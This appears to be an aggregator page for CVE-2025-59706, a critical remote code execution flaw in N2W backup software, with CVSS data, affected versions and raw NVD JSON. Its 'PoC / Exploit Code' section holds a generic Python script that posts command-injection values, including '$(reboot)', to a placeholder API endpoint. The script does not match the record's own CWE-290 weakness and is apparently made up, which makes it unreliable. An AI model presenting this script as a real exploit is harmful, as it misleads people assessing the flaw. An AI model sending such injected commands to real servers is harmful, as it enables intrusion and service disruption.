Security Vulnerability Report
中文
CVE-2025-59706 CVSS 9.8 CRITICAL

CVE-2025-59706

Published: 2026-03-25 15:16:29
Last Modified: 2026-04-25 18:01:25

Description

In N2W before 4.3.2 and 4.4.0 before 4.4.1, improper validation of API request parameters enables remote code execution.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:n2ws:n2w:*:*:*:*:*:*:*:* - VULNERABLE
N2W < 4.3.2
4.4.0 <= N2W < 4.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Placeholder) target_url = "http://target-n2w-server/api/v1/endpoint" # Malicious payload exploiting parameter validation issue # This payload attempts to execute a system command (e.g., 'id' or 'whoami') payload = { "vulnerable_param": "; id; #", "config": { "command": "$(reboot)" } } try: response = requests.post(target_url, json=payload, timeout=10) if response.status_code == 200: print("[+] Potential exploit successful!") print("Response:", response.text) else: print("[-] Exploit failed or patched.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59706", "sourceIdentifier": "[email protected]", "published": "2026-03-25T15:16:29.140", "lastModified": "2026-04-25T18:01:24.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In N2W before 4.3.2 and 4.4.0 before 4.4.1, improper validation of API request parameters enables remote code execution."}, {"lang": "es", "value": "En N2W antes de 4.3.2 y 4.4.0 antes de 4.4.1, la validación indebida de los parámetros de solicitud de la API permite la ejecución remota de código."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-290"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:n2ws:n2w:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.3.2", "matchCriteriaId": "C5D0510D-0043-47A2-A54C-CCEAB98B60E8"}]}]}], "references": [{"url": "https://n2ws.com/blog/security-advisory-update", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://n2ws.zendesk.com/hc/en-us/articles/29817965452701-Release-notes-for-N2W-V4-3-2-August-2025", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.n2ws.com", "source": "[email protected]", "tags": ["Product"]}]}}